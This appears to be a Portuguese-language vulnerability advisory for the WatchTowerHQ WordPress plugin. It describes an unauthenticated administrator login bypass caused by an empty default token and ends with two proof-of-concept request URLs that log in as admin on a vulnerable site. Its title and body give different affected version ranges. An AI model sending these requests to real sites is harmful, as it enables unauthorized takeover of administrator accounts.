
WatchTowerHQ <= 3.10.1 - Bypass de Autenticação para Administrador devido a Falta de Verificação de Valor Vazio
WatchTowerHQ <= 3.10.1 - Bypass de Autenticação para Administrador devido à Falta de Verificação de Valor Vazio
O plugin WatchTowerHQ para WordPress é vulnerável a bypass de autenticação nas versões até, e incluindo, 3.9.6. Isso se deve ao fato de o valor padrão de 'watchtower_ota_token' estar vazio, e a verificação de não vazio estar ausente na função 'Password_Less_Access::login'. Isso possibilita que atacantes não autenticados façam login no usuário administrador do cliente WatchTowerHQ.
State: PUBLISHED
Score: 9.8
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
http://kubernetes.docker.internal/?wht_login=1
OR
http://kubernetes.docker.internal/?wht_login=1&access_token=not_set
Se vulnerável, isso fará o login como administrador.